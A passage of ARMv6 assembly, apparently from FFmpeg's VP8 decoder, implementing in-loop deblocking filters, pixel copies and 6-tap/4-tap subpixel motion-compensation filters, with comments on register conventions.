ldr r10, [sp, #8] @ qs1
shadd8 r7, r7, lr @ vp8_filter >>= 1
eor r8, r8, r12 @ *op0 = u ^ 0x80
bic r7, r7, r6 @ vp8_filter &= ~hev
qadd8 r11, r11, r7 @ u = vp8_signed_char_clamp(ps1 + vp8_filter)
eor r9, r9, r12 @ *oq0 = u ^ 0x80
qsub8 r10, r10, r7 @ u = vp8_signed_char_clamp(qs1 - vp8_filter)
eor r11, r11, r12 @ *op1 = u ^ 0x80
eor r10, r10, r12 @ *oq1 = u ^ 0x80
.endm
@ Edge-filter tap: compute u = clamp((63 + Filter2 * \c0) >> 7) for
@ each of the 4 bytes of r12 (the hev-masked filter), using 16-bit
@ signed multiplies with per-lane saturation, then apply it to the
@ signed pixel pair in r9 (q side) / r11 (p side) and un-bias.
@ Out: r8 = output q pixel row, r10 = output p pixel row.
.macro filter_x c0
mov lr, \c0
mov r7, #63
sxtb16 r6, r12 @ lanes 0,2 as signed 16-bit
sxtb16 r10, r12, ror #8 @ lanes 1,3 as signed 16-bit
smlabb r8, r6, lr, r7
smlatb r6, r6, lr, r7
smlabb r7, r10, lr, r7
smultb r10, r10, lr
ssat r8, #8, r8, asr #7
ssat r6, #8, r6, asr #7
add r10, r10, #63 @ bias added separately (r7 was consumed)
ssat r7, #8, r7, asr #7
ssat r10, #8, r10, asr #7
pkhbt r6, r8, r6, lsl #16
pkhbt r10, r7, r10, lsl #16
uxtb16 r6, r6
uxtb16 r10, r10
mov32 lr, 0x80808080
orr r10, r6, r10, lsl #8 @ u = vp8_signed_char_clamp((63 + Filter2 * 27)>>7)
qsub8 r8, r9, r10 @ s = vp8_signed_char_clamp(qs0 - u)
qadd8 r10, r11, r10 @ s = vp8_signed_char_clamp(ps0 + u)
eor r8, r8, lr @ *oq0 = s ^ 0x80
eor r10, r10, lr @ *op0 = s ^ 0x80
.endm
@ Edge filter, innermost tap (coefficient 27, applied to p0/q0).
@ Also applies Filter2/Filter1 to ps0/qs0 first and strips hev bytes
@ from the saved full-strength filter in r12.
.macro filter_1
ldm sp, {r8, r9} @ ps0, qs0
qadd8 r11, r8, lr @ ps0 + Filter2
qsub8 r9, r9, r7 @ qs0 - Filter1
bic r12, r12, r6 @ vp8_filter &= ~hev
filter_x #27
.endm
@ Edge filter, middle tap (coefficient 18, applied to p1/q1).
@ Reloads the signed qs1/ps1 pixels spilled by the filter macro.
.macro filter_2
ldr r9, [sp, #8] @ qs1
ldr r11, [sp, #12] @ ps1
filter_x #18
.endm
@ Edge filter, outermost tap (coefficient 9, applied to p2/q2).
@ The caller loads raw q2/p2 into r9/r11; bias them into signed domain
@ here (lr still holds 0x80808080 from filter_x).
.macro filter_3
eor r9, r9, lr
eor r11, r11, lr
filter_x #9
.endm
@ Shared worker for the vertical (horizontal-edge) inner loop filter.
@ On entry (set up by the ff_* stubs below): r0 = dst, r1 = stride,
@ r2 = flim_E (16-bit duplicated), r3 = flim_I, r6 = hev thresh,
@ [sp] = pointer for the second half (dst+8 or the V plane).
@ Processes 4 pixels per iteration, 8 iterations total (4 per half).
function vp8_v_loop_filter_inner_armv6
mov r5, #4 @ iterations per half
sub sp, sp, #16 @ scratch for filter macros
orr r2, r2, r2, lsl #16 @ idempotent if already duplicated
orr r3, r3, r3, lsl #16
orr r6, r6, r6, lsl #16
orr r4, r2, r2, lsl #8 @ flimE
orr r2, r3, r3, lsl #8 @ flimI
orr r3, r6, r6, lsl #8 @ thresh
1:
sub r0, r0, r1, lsl #2 @ back up to p3
ldr r10, [r0, r1] @ p2
ldr_post r9, r0, r1, lsl #1 @ p3
ldr r12, [r0, r1] @ p0
ldr_post r11, r0, r1, lsl #1 @ p1
filter_mask_v
cmp lr, #0 @ all lanes masked off?
beq 2f
filter_v inner=1
filter_inner
A str r11, [r0, -r1, lsl #1] @ op1
A str r8, [r0, -r1] @ op0
T sub r0, r0, r1, lsl #1
T str r8, [r0, r1]
T str_post r11, r0, r1, lsl #1
str r9, [r0] @ oq0
str r10, [r0, r1] @ oq1
2:
add r0, r0, #4 @ next 4 pixels
cmp r5, #3
it eq
ldreq r0, [sp, #16] @ after 1st iter switch to 2nd half
subs r5, r5, #1
bne 1b
add sp, sp, #16
pop {r0, r4-r11, pc}
endfunc
@ void ff_vp8_v_loop_filter16_inner(uint8_t *dst, ptrdiff_t stride,
@ int flim_E, int flim_I, int hev_thresh)
@ Pushes dst+8 as the second-half pointer and tail-calls the worker.
function ff_vp8_v_loop_filter16_inner_armv6, export=1
push {r4-r11, lr}
add r12, r0, #8 @ second 8 columns
push {r12}
ldr r6, [sp, #40] @ hev_thresh (5th arg)
orr r2, r2, r2, lsl #16
b vp8_v_loop_filter_inner_armv6
endfunc
@ void ff_vp8_v_loop_filter8uv_inner(uint8_t *dstU, uint8_t *dstV,
@ ptrdiff_t stride, int flim_E, int flim_I, int hev_thresh)
@ Pushes dstV as the second-half pointer and remaps args for the worker.
function ff_vp8_v_loop_filter8uv_inner_armv6, export=1
push {r1, r4-r11, lr} @ r1 (dstV) becomes [sp,#0]
mov r1, r2 @ stride
orr r2, r3, r3, lsl #16 @ flim_E duplicated
ldr r3, [sp, #40] @ flim_I
ldr r6, [sp, #44] @ hev_thresh
b vp8_v_loop_filter_inner_armv6
endfunc
@ Shared worker for the vertical (horizontal-edge) macroblock-edge
@ filter. Same entry convention as vp8_v_loop_filter_inner_armv6,
@ but runs the stronger 3-stage (27/18/9) filter touching p2..q2.
function vp8_v_loop_filter_armv6
mov r5, #4
sub sp, sp, #16
orr r3, r3, r3, lsl #16
orr r6, r6, r6, lsl #16
orr r4, r2, r2, lsl #8 @ flimE
orr r2, r3, r3, lsl #8 @ flimI
orr r3, r6, r6, lsl #8 @ thresh
1:
sub r0, r0, r1, lsl #2
ldr r10, [r0, r1] @ p2
ldr_post r9, r0, r1, lsl #1 @ p3
ldr r12, [r0, r1] @ p0
ldr_post r11, r0, r1, lsl #1 @ p1
filter_mask_v
cmp lr, #0
beq 2f
filter_v inner=0
filter_1
str r8, [r0] @ *oq0
A str r10, [r0, -r1] @ *op0
T sub r0, r0, r1, lsl #1
T str r10, [r0, r1]
filter_2
A str r10, [r0, -r1, lsl #1] @ *op1
T str_post r10, r0, r1, lsl #1
str r8, [r0, r1] @ *oq1
ldr r9, [r0, r1, lsl #1] @ q2
add r0, r0, r1
A ldr r11, [r0, -r1, lsl #2] @ p2
T ldr_dpre r11, r0, r1, lsl #2
filter_3
A str r10, [r0, -r1, lsl #2] @ *op2
T str_post r10, r0, r1, lsl #2
str r8, [r0, r1] @ *oq2
sub r0, r0, r1
2:
add r0, r0, #4
cmp r5, #3
it eq
ldreq r0, [sp, #16] @ switch to second half
subs r5, r5, #1
bne 1b
add sp, sp, #16
pop {r0, r4-r11, pc}
endfunc
@ void ff_vp8_v_loop_filter16(uint8_t *dst, ptrdiff_t stride,
@ int flim_E, int flim_I, int hev_thresh)
function ff_vp8_v_loop_filter16_armv6, export=1
push {r4-r11, lr}
add r12, r0, #8 @ second 8 columns
push {r12}
ldr r6, [sp, #40] @ hev_thresh
orr r2, r2, r2, lsl #16
b vp8_v_loop_filter_armv6
endfunc
@ void ff_vp8_v_loop_filter8uv(uint8_t *dstU, uint8_t *dstV,
@ ptrdiff_t stride, int flim_E, int flim_I, int hev_thresh)
function ff_vp8_v_loop_filter8uv_armv6, export=1
push {r1, r4-r11, lr} @ dstV becomes the second-half pointer
mov r1, r2 @ stride
orr r2, r3, r3, lsl #16 @ flim_E duplicated
ldr r3, [sp, #40] @ flim_I
ldr r6, [sp, #44] @ hev_thresh
b vp8_v_loop_filter_armv6
endfunc
@ void vp8_h_loop_filter16_simple(uint8_t *dst, int stride, int flim)
@ Simple horizontal (vertical-edge) filter across a 16-row edge:
@ loads 4 rows of 4 bytes around the edge, transposes to columns,
@ applies the simple filter, transposes back via byte extracts and
@ stores two modified pixels per row. 4 iterations of 4 rows.
function ff_vp8_h_loop_filter16_simple_armv6
push {r4-r11, lr}
orr r12, r2, r2, lsl #16
mov32 r2, 0x80808080
orr r12, r12, r12, lsl #8 @ flim duplicated to all 4 bytes
mov lr, #0
mov r11, #4 @ 4 groups of 4 rows
1:
sub r0, r0, #2 @ 2 pixels left of the edge
ldr r8, [r0, r1]
ldr_post r7, r0, r1, lsl #1
ldr r10, [r0, r1]
ldr_post r9, r0, r1, lsl #1
add r0, r0, #2
transpose r6, r5, r4, r3, r7, r8, r9, r10
simple_filter
sub r0, r0, r1, lsl #2 @ back to first of the 4 rows
sub r0, r0, #1
uxtb16 r6, r4 @ interleave filtered p0/q0 back
uxtb16 r8, r5
uxtb16 r7, r4, ror #8
uxtb16 r9, r5, ror #8
orr r6, r6, r8, lsl #8
orr r7, r7, r9, lsl #8
lsr r4, r6, #16
lsr r5, r7, #16
strh_post r6, r0, r1 @ store p0|q0 pairs, one row each
strh_post r7, r0, r1
strh_post r4, r0, r1
strh_post r5, r0, r1
add r0, r0, #1
2:
subs r11, r11, #1
bne 1b
pop {r4-r11, pc}
endfunc
@ Shared worker for the horizontal (vertical-edge) inner loop filter.
@ On entry: r0 = dst, r1 = stride, r2 = flim_E (duplicated), r3 = flim_I,
@ r9 = hev thresh, [sp] = pointer for the second half.
@ Works on 4 rows per iteration; pixels are transposed to/from columns.
function vp8_h_loop_filter_inner_armv6
mov r5, #4
sub sp, sp, #16
orr r3, r3, r3, lsl #16
orr r9, r9, r9, lsl #16
orr r4, r2, r2, lsl #8 @ flimE
orr r2, r3, r3, lsl #8 @ flimI
orr r3, r9, r9, lsl #8 @ thresh
sub r0, r0, #4 @ 4 pixels left of the edge
1:
ldr r7, [r0, r1]
ldr_post r6, r0, r1, lsl #1
ldr lr, [r0, r1]
ldr_post r8, r0, r1, lsl #1
filter_mask_h
cmp lr, #0 @ nothing to filter?
sub r0, r0, #2
beq 2f
ldr r6, [sp]
filter_h inner=1
filter_inner
transpose lr, r12, r7, r6, r11, r8, r9, r10 @ back to row order
A str r6, [r0, -r1, lsl #1]
A str r7, [r0, -r1]
T sub r0, r0, r1, lsl #1
T str r7, [r0, r1]
T str_post r6, r0, r1, lsl #1
str r12, [r0]
str lr, [r0, r1]
2:
sub r0, r0, #2
add r0, r0, r1, lsl #1 @ next 4 rows (2 already consumed)
cmp r5, #3
it eq
ldreq r0, [sp, #16] @ switch to second half
subs r5, r5, #1
bne 1b
add sp, sp, #16
pop {r0, r4-r11, pc}
endfunc
@ void ff_vp8_h_loop_filter16_inner(uint8_t *dst, ptrdiff_t stride,
@ int flim_E, int flim_I, int hev_thresh)
@ Second half starts 8 rows down; pre-biased by -4 to match the
@ worker's column offset.
function ff_vp8_h_loop_filter16_inner_armv6, export=1
push {r4-r11, lr}
add r12, r0, r1, lsl #3 @ dst + 8*stride
sub r12, r12, #4
push {r12}
ldr r9, [sp, #40] @ hev_thresh
orr r2, r2, r2, lsl #16
b vp8_h_loop_filter_inner_armv6
endfunc
@ void ff_vp8_h_loop_filter8uv_inner(uint8_t *dstU, uint8_t *dstV,
@ ptrdiff_t stride, int flim_E, int flim_I, int hev_thresh)
function ff_vp8_h_loop_filter8uv_inner_armv6, export=1
sub r1, r1, #4 @ pre-bias dstV like the worker does
push {r1, r4-r11, lr}
mov r1, r2 @ stride
orr r2, r3, r3, lsl #16 @ flim_E duplicated
ldr r3, [sp, #40] @ flim_I
ldr r9, [sp, #44] @ hev_thresh
b vp8_h_loop_filter_inner_armv6
endfunc
@ Shared worker for the horizontal (vertical-edge) macroblock-edge
@ filter. Entry convention as vp8_h_loop_filter_inner_armv6.
@ After the 3-stage filter, modified pixels p2..q2 are written back
@ per row with byte stores (no full transpose of the wide result).
function vp8_h_loop_filter_armv6
mov r5, #4
sub sp, sp, #16
orr r3, r3, r3, lsl #16
orr r9, r9, r9, lsl #16
orr r4, r2, r2, lsl #8 @ flimE
orr r2, r3, r3, lsl #8 @ flimI
orr r3, r9, r9, lsl #8 @ thresh
1:
sub r0, r0, #4
ldr r7, [r0, r1]
ldr_post r6, r0, r1, lsl #1
ldr lr, [r0, r1]
ldr_post r8, r0, r1, lsl #1
filter_mask_h
cmp lr, #0
it eq
addeq r0, r0, r1, lsl #1 @ skip these 4 rows entirely
beq 2f
ldr r6, [sp]
sub r0, r0, #2
filter_h inner=0
filter_1
sub r0, r0, r1, lsl #1
uxtb16 r6, r10 @ interleave op0/oq0 into row pairs
uxtb16 r7, r8
uxtb16 r10, r10, ror #8
uxtb16 r8, r8, ror #8
orr r6, r6, r7, lsl #8
orr r10, r10, r8, lsl #8
lsr r7, r6, #16
lsr r8, r10, #16
add r0, r0, #1
strh_post r6, r0, r1
strh_post r10, r0, r1
strh_post r7, r0, r1
strh_post r8, r0, r1
filter_2
sub r0, r0, r1, lsl #2
add r0, r0, #3
ldrb r11, [r0, #-5] @ p2 for 1/7th difference
strb r10, [r0, #-4] @ op1
strb r8, [r0, #-1] @ oq1
ldrb_post r9, r0, r1 @ q2 for 1/7th difference
lsr r10, r10, #8
lsr r8, r8, #8
ldrb r6, [r0, #-5]
strb r10, [r0, #-4]
strb r8, [r0, #-1]
ldrb_post r7, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
orr r11, r11, r6, lsl #8 @ accumulate p2 column into a word
orr r9, r9, r7, lsl #8 @ accumulate q2 column into a word
ldrb r6, [r0, #-5]
strb r10, [r0, #-4]
strb r8, [r0, #-1]
ldrb_post r7, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
orr r11, r11, r6, lsl #16
orr r9, r9, r7, lsl #16
ldrb r6, [r0, #-5]
strb r10, [r0, #-4]
strb r8, [r0, #-1]
ldrb_post r7, r0, r1
orr r11, r11, r6, lsl #24
orr r9, r9, r7, lsl #24
filter_3
sub r0, r0, r1, lsl #2
strb r10, [r0, #-5] @ op2, one byte per row
strb_post r8, r0, r1 @ oq2
lsr r10, r10, #8
lsr r8, r8, #8
strb r10, [r0, #-5]
strb_post r8, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
strb r10, [r0, #-5]
strb_post r8, r0, r1
lsr r10, r10, #8
lsr r8, r8, #8
strb r10, [r0, #-5]
strb_post r8, r0, r1
sub r0, r0, #2
2:
cmp r5, #3
it eq
ldreq r0, [sp, #16] @ switch to second half
subs r5, r5, #1
bne 1b
add sp, sp, #16
pop {r0, r4-r11, pc}
endfunc
@ void ff_vp8_h_loop_filter16(uint8_t *dst, ptrdiff_t stride,
@ int flim_E, int flim_I, int hev_thresh)
function ff_vp8_h_loop_filter16_armv6, export=1
push {r4-r11, lr}
add r12, r0, r1, lsl #3 @ second half: dst + 8*stride
push {r12}
ldr r9, [sp, #40] @ hev_thresh
orr r2, r2, r2, lsl #16
b vp8_h_loop_filter_armv6
endfunc
@ void ff_vp8_h_loop_filter8uv(uint8_t *dstU, uint8_t *dstV,
@ ptrdiff_t stride, int flim_E, int flim_I, int hev_thresh)
function ff_vp8_h_loop_filter8uv_armv6, export=1
push {r1, r4-r11, lr} @ dstV becomes the second-half pointer
mov r1, r2 @ stride
orr r2, r3, r3, lsl #16 @ flim_E duplicated
ldr r3, [sp, #40] @ flim_I
ldr r9, [sp, #44] @ hev_thresh
b vp8_h_loop_filter_armv6
endfunc
.ltorg
@ MC
@ void put_vp8_pixels16(uint8_t *dst, int dststride, uint8_t *src,
@ int srcstride, int h, int mx, int my)
@ Plain 16xN copy, two rows per iteration (mx/my are 0 here).
function ff_put_vp8_pixels16_armv6, export=1
push {r4-r11}
ldr r12, [sp, #32] @ h
1:
subs r12, r12, #2
ldr r5, [r2, #4] @ load 16 bytes of row 0
ldr r6, [r2, #8]
ldr r7, [r2, #12]
ldr_post r4, r2, r3
ldr r9, [r2, #4] @ load 16 bytes of row 1
ldr r10, [r2, #8]
ldr r11, [r2, #12]
ldr_post r8, r2, r3
strd r6, r7, [r0, #8]
strd_post r4, r5, r0, r1
strd r10, r11, [r0, #8]
strd_post r8, r9, r0, r1
bgt 1b
pop {r4-r11}
bx lr
endfunc
@ void put_vp8_pixels8(uint8_t *dst, int dststride, uint8_t *src,
@ int srcstride, int h, int mx, int my)
@ Plain 8xN copy, four rows per iteration.
function ff_put_vp8_pixels8_armv6, export=1
push {r4-r11}
ldr r12, [sp, #32] @ h
1:
subs r12, r12, #4
ldr r5, [r2, #4]
ldr_post r4, r2, r3
ldr r7, [r2, #4]
ldr_post r6, r2, r3
ldr r9, [r2, #4]
ldr_post r8, r2, r3
ldr r11, [r2, #4]
ldr_post r10, r2, r3
strd_post r4, r5, r0, r1
strd_post r6, r7, r0, r1
strd_post r8, r9, r0, r1
strd_post r10, r11, r0, r1
bgt 1b
pop {r4-r11}
bx lr
endfunc
@ void put_vp8_pixels4(uint8_t *dst, int dststride, uint8_t *src,
@ int srcstride, int h, int mx, int my)
@ Plain 4xN copy, four rows per iteration (one word per row).
function ff_put_vp8_pixels4_armv6, export=1
ldr r12, [sp, #0] @ h
push {r4-r6,lr}
1:
subs r12, r12, #4
ldr_post r4, r2, r3
ldr_post r5, r2, r3
ldr_post r6, r2, r3
ldr_post lr, r2, r3
str_post r4, r0, r1
str_post r5, r0, r1
str_post r6, r0, r1
str_post lr, r0, r1
bgt 1b
pop {r4-r6,pc}
endfunc
@ note: worst case sum of all 6-tap filter values * 255 is 0x7f80 so 16 bit
@ arithmetic can be used to apply filters
@ 6-tap subpel filter coefficients, taps reordered (as the name
@ suggests: 1,3,2,4,5,6 + padding) for pairwise smlad use; one
@ 16-byte row per even subpel position.
const sixtap_filters_13245600, align=4
.short 2, 108, -11, 36, -8, 1, 0, 0
.short 3, 77, -16, 77, -16, 3, 0, 0
.short 1, 36, -8, 108, -11, 2, 0, 0
endconst
@ 4-tap subpel filter coefficients, taps reordered (1,3,2,4) for
@ pairwise smlad use; one 8-byte row per odd subpel position.
const fourtap_filters_1324, align=4
.short -6, 12, 123, -1
.short -9, 50, 93, -6
.short -6, 93, 50, -9
.short -1, 123, 12, -6
endconst
@ Emit a one-dimensional MC entry point: marshal the C arguments
@ (dst, dst_stride, src, src_stride, h, mx, my) into the internal
@ convention (see the block comment above vp8_put_epel_h6_armv6)
@ and jump into the shared inner function.
.macro vp8_mc_1 name, size, hv
function ff_put_vp8_\name\size\()_\hv\()_armv6, export=1
sub r1, r1, #\size @ r1 = dst_stride - width
mov r12, sp
push {r1, r4-r11, lr}
ldm r12, {r5-r7} @ h, mx, my
mov r4, #\size
stm r12, {r4, r5} @ caller stack: width, height
orr r12, r6, r7 @ filter index (only one of mx/my is set)
b bl_put_\name\()_\hv\()_armv6
endfunc
.endm
vp8_mc_1 epel, 16, h6
vp8_mc_1 epel, 16, v6
vp8_mc_1 epel, 8, h6
vp8_mc_1 epel, 8, v6
vp8_mc_1 epel, 8, h4
vp8_mc_1 epel, 8, v4
vp8_mc_1 epel, 4, h6
vp8_mc_1 epel, 4, v6
vp8_mc_1 epel, 4, h4
vp8_mc_1 epel, 4, v4
vp8_mc_1 bilin, 16, h
vp8_mc_1 bilin, 16, v
vp8_mc_1 bilin, 8, h
vp8_mc_1 bilin, 8, v
vp8_mc_1 bilin, 4, h
vp8_mc_1 bilin, 4, v
/* True relational expressions have the value -1 in the GNU assembler,
+1 in Apple's. */
#ifdef __APPLE__
# define TMPSIZE \size * (8 + 8*(\size > 4) + \ytaps - 1)
#else
# define TMPSIZE \size * (8 - 8*(\size > 4) + \ytaps - 1)
#endif
@ Emit a two-dimensional MC entry point: run the horizontal filter
@ into a stack temporary (TMPSIZE bytes, \ytaps-1 extra rows), then
@ the vertical filter from the temporary into dst.
.macro vp8_mc_hv name, size, h, v, ytaps
function ff_put_vp8_\name\size\()_\h\v\()_armv6, export=1
push {r0, r1, r4, lr}
add r0, sp, #16 @ caller stack args
sub sp, sp, #TMPSIZE+16
ldm r0, {r0, r12} @ h, mx
mov r4, #\size
add lr, r0, #\ytaps-1 @ rows needed by the h pass
.if \ytaps > 2
sub r2, r2, r3, lsl #\ytaps >> 1 & 1 @ back up src by (ytaps/2 - 1) rows
.endif
stm sp, {r4, lr} @ width, height for the h pass
add r0, sp, #16 @ dst = temporary
mov r1, #0 @ temp is contiguous
bl vp8_put_\name\()_\h\()_armv6
add r0, sp, #TMPSIZE+16
ldr lr, [sp, #TMPSIZE+16+16] @ height for the v pass
ldm r0, {r0, r1} @ real dst, dst_stride - width
mov r3, #\size @ temp stride
ldr r12, [sp, #TMPSIZE+16+16+8] @ my
str lr, [sp, #4]
add r2, sp, #16 + \size * (\ytaps / 2 - 1) @ centre of temp
sub r1, r1, #\size
bl vp8_put_\name\()_\v\()_armv6
add sp, sp, #TMPSIZE+16+8
pop {r4, pc}
endfunc
.endm
vp8_mc_hv epel, 16, h6, v6, 6
vp8_mc_hv epel, 8, h6, v6, 6
vp8_mc_hv epel, 8, h4, v6, 6
vp8_mc_hv epel, 8, h6, v4, 4
vp8_mc_hv epel, 8, h4, v4, 4
vp8_mc_hv epel, 4, h6, v6, 6
vp8_mc_hv epel, 4, h4, v6, 6
vp8_mc_hv epel, 4, h6, v4, 4
vp8_mc_hv epel, 4, h4, v4, 4
vp8_mc_hv bilin, 16, h, v, 2
vp8_mc_hv bilin, 8, h, v, 2
vp8_mc_hv bilin, 4, h, v, 2
@ Shift four 16-bit accumulators right by 7, saturate each to u8
@ and pack them into \r0 (\r0 = lowest byte .. \r3 = highest).
.macro sat4 r0, r1, r2, r3
asr \r0, \r0, #7
asr \r1, \r1, #7
pkhbt \r0, \r0, \r2, lsl #9 @ lsl #9 = (<<16) >> 7
pkhbt \r1, \r1, \r3, lsl #9
usat16 \r0, #8, \r0
usat16 \r1, #8, \r1
orr \r0, \r0, \r1, lsl #8
.endm
@ Calling convention for the inner MC functions:
@ r0 dst
@ r1 dst_stride - block_width
@ r2 src
@ r3 src_stride
@ r4 block_width
@ r12 filter_index
@ [sp] block_width
@ [sp+4] height
@ [sp+8] scratch
@ Horizontal 6-tap subpel filter, 4 output pixels per inner iteration.
@ Internal convention (see block comment above): r0 dst,
@ r1 dst_stride-width, r2 src, r3 src_stride, r4 width,
@ r12 filter index, [sp+40] width, [sp+44] height, [sp+48] scratch.
function vp8_put_epel_h6_armv6
push {r1, r4-r11, lr}
bl_put_epel_h6_armv6:
sub r2, r2, #2 @ 2 left context pixels
movrel lr, sixtap_filters_13245600 - 16
add lr, lr, r12, lsl #3 @ select filter row
sub r3, r3, r4
str r3, [sp, #48] @ src line advance
ldm lr, {r1, r3, lr} @ filter tap pairs
1:
ldr r7, [r2, #5] @ src[5-8]
ldr r6, [r2, #2] @ src[2-5]
ldr r5, [r2], #4 @ src[0-3]
pkhtb r7, r7, r7, asr #8 @ src[8,7,7,6]
uxtb16 r9, r6, ror #8 @ src[5] | src[3]
uxtb16 r6, r6 @ src[4] | src[2]
uxtb16 r8, r5, ror #8 @ src[3] | src[1]
uxtb16 r11, r7, ror #8 @ src[8] | src[7]
uxtb16 r7, r7 @ src[7] | src[6]
uxtb16 r5, r5 @ src[2] | src[0]
mov r10, #0x40 @ rounding bias
smlad r5, r5, r1, r10 @ filter[0][0]
smlad r11, r11, lr, r10 @ filter[3][2]
smlad r12, r7, lr, r10 @ filter[2][2]
smlad r10, r8, r1, r10 @ filter[1][0]
smlad r5, r8, r3, r5 @ filter[0][1]
smlad r11, r9, r1, r11 @ filter[3][0]
smlad r12, r9, r3, r12 @ filter[2][1]
pkhtb r9, r9, r6, asr #16 @ src[5] | src[4]
smlad r10, r6, r3, r10 @ filter[1][1]
pkhbt r7, r9, r7, lsl #16 @ src[6] | src[4]
smlad r5, r9, lr, r5 @ filter[0][2]
pkhtb r8, r7, r9, asr #16 @ src[6] | src[5]
smlad r11, r7, r3, r11 @ filter[3][1]
smlad r9, r8, lr, r10 @ filter[1][2]
smlad r7, r6, r1, r12 @ filter[2][0]
subs r4, r4, #4
sat4 r5, r9, r7, r11
str r5, [r0], #4
bne 1b
add r4, sp, #40 @ reload per-line state
ldm r4, {r4, r5, r12} @ width, height, line advance
ldr r6, [sp]
subs r5, r5, #1
add r2, r2, r12
str r5, [sp, #44]
add r0, r0, r6
bne 1b
pop {r1, r4-r11, pc}
endfunc
@ Vertical 6-tap subpel filter, 4 output pixels (one word) per inner
@ iteration, reading 6 source rows around r2. Same internal calling
@ convention as vp8_put_epel_h6_armv6.
function vp8_put_epel_v6_armv6
push {r1, r4-r11, lr}
bl_put_epel_v6_armv6:
movrel lr, sixtap_filters_13245600 - 16
add lr, lr, r12, lsl #3 @ select filter row
str r3, [sp, #48] @ save src_stride
1:
add r1, r3, r3, lsl #1 @ stride * 3
ldr_nreg r5, r2, r3 @ src[0,1,2,3 + stride * 1]
ldr r6, [r2, r3] @ src[0,1,2,3 + stride * 3]
ldr r7, [r2, r3, lsl #1] @ src[0,1,2,3 + stride * 4]
ldr r8, [r2, r1] @ src[0,1,2,3 + stride * 5]
uxtb16 r9, r5, ror #8 @ src[3 + s*1] | src[1 + s*1]
uxtb16 r10, r6, ror #8 @ src[3 + s*3] | src[1 + s*3]
uxtb16 r11, r7, ror #8 @ src[3 + s*4] | src[1 + s*4]
uxtb16 r12, r8, ror #8 @ src[3 + s*5] | src[1 + s*5]
uxtb16 r5, r5 @ src[2 + s*1] | src[0 + s*1]
uxtb16 r6, r6 @ src[2 + s*3] | src[0 + s*3]
uxtb16 r7, r7 @ src[2 + s*4] | src[0 + s*4]
uxtb16 r8, r8 @ src[2 + s*5] | src[0 + s*5]
pkhbt r1, r9, r10, lsl #16 @ src[1 + s*3] | src[1 + s*1]
pkhtb r9, r10, r9, asr #16 @ src[3 + s*3] | src[3 + s*1]
pkhbt r10, r11, r12, lsl #16 @ src[1 + s*5] | src[1 + s*4]
pkhtb r11, r12, r11, asr #16 @ src[3 + s*5] | src[3 + s*4]
pkhbt r12, r5, r6, lsl #16 @ src[0 + s*3] | src[0 + s*1]
pkhtb r5, r6, r5, asr #16 @ src[2 + s*3] | src[2 + s*1]
pkhbt r6, r7, r8, lsl #16 @ src[0 + s*5] | src[0 + s*4]
pkhtb r7, r8, r7, asr #16 @ src[2 + s*5] | src[2 + s*4]
ldr r8, [lr, #4] @ middle tap pair
mov r3, #0x40 @ rounding bias
smlad r12, r12, r8, r3 @ filter[0][1]
smlad r1, r1, r8, r3 @ filter[1][1]
smlad r5, r5, r8, r3 @ filter[2][1]
smlad r9, r9, r8, r3 @ filter[3][1]
ldr r8, [lr, #8] @ last tap pair
ldr r3, [sp, #48] @ restore stride
smlad r12, r6, r8, r12 @ filter[0][2]
smlad r1, r10, r8, r1 @ filter[1][2]
ldr_nreg r6, r2, r3, lsl #1 @ src[0,1,2,3 + stride * 0]
ldr r10, [r2], #4 @ src[0,1,2,3 + stride * 2]
smlad r5, r7, r8, r5 @ filter[2][2]
smlad r9, r11, r8, r9 @ filter[3][2]
uxtb16 r7, r6, ror #8 @ src[3 + s*0] | src[1 + s*0]
uxtb16 r11, r10, ror #8 @ src[3 + s*2] | src[1 + s*2]
uxtb16 r6, r6 @ src[2 + s*0] | src[0 + s*0]
uxtb16 r10, r10 @ src[2 + s*2] | src[0 + s*2]
pkhbt r8, r7, r11, lsl #16 @ src[1 + s*2] | src[1 + s*0]
pkhtb r7, r11, r7, asr #16 @ src[3 + s*2] | src[3 + s*0]
pkhbt r11, r6, r10, lsl #16 @ src[0 + s*2] | src[0 + s*0]
pkhtb r6, r10, r6, asr #16 @ src[2 + s*2] | src[2 + s*0]
ldr r10, [lr] @ first tap pair
subs r4, r4, #4
smlad r12, r11, r10, r12 @ filter[0][0]
smlad r1, r8, r10, r1 @ filter[1][0]
smlad r5, r6, r10, r5 @ filter[2][0]
smlad r9, r7, r10, r9 @ filter[3][0]
sat4 r12, r1, r5, r9
str r12, [r0], #4
bne 1b
ldrd r4, r5, [sp, #40] @ width, height
ldr r6, [sp]
subs r5, r5, #1
sub r2, r2, r4 @ rewind src to line start
str r5, [sp, #44]
add r0, r0, r6
add r2, r2, r3 @ advance src one line
bne 1b
pop {r1, r4-r11, pc}
endfunc
@ Horizontal 4-tap subpel filter, 4 output pixels per inner iteration.
@ Same internal calling convention as vp8_put_epel_h6_armv6.
function vp8_put_epel_h4_armv6
push {r1, r4-r11, lr}
bl_put_epel_h4_armv6:
subs r2, r2, #1 @ 1 left context pixel
movrel lr, fourtap_filters_1324 - 4
add lr, lr, r12, lsl #2 @ select filter row
sub r3, r3, r4 @ src line advance
ldm lr, {r5, r6} @ filter tap pairs
ldr lr, [sp, #44] @ height
1:
ldr r9, [r2, #3]
ldr r8, [r2, #2]
ldr r7, [r2], #4
uxtb16 r9, r9, ror #8 @ src[6] | src[4]
uxtb16 r10, r8, ror #8 @ src[5] | src[3]
uxtb16 r8, r8 @ src[4] | src[2]
uxtb16 r11, r7, ror #8 @ src[3] | src[1]
uxtb16 r7, r7 @ src[2] | src[0]
mov r12, #0x40 @ rounding bias
smlad r9, r9, r6, r12 @ filter[3][1]
smlad r7, r7, r5, r12 @ filter[0][0]
smlad r9, r10, r5, r9 @ filter[3][0]
smlad r10, r10, r6, r12 @ filter[2][1]
smlad r12, r11, r5, r12 @ filter[1][0]
smlad r7, r11, r6, r7 @ filter[0][1]
smlad r10, r8, r5, r10 @ filter[2][0]
smlad r12, r8, r6, r12 @ filter[1][1]
subs r4, r4, #4
sat4 r7, r12, r10, r9
str r7, [r0], #4
bne 1b
subs lr, lr, #1 @ next line
ldr r4, [sp, #40] @ reload width
add r2, r2, r3
add r0, r0, r1
bne 1b
pop {r1, r4-r11, pc}
endfunc
@ Vertical 4-tap subpel filter, 4 output pixels per inner iteration,
@ reading 4 source rows around r2. Same internal calling convention
@ as vp8_put_epel_h6_armv6.
function vp8_put_epel_v4_armv6
push {r1, r4-r11, lr}
bl_put_epel_v4_armv6:
movrel lr, fourtap_filters_1324 - 4
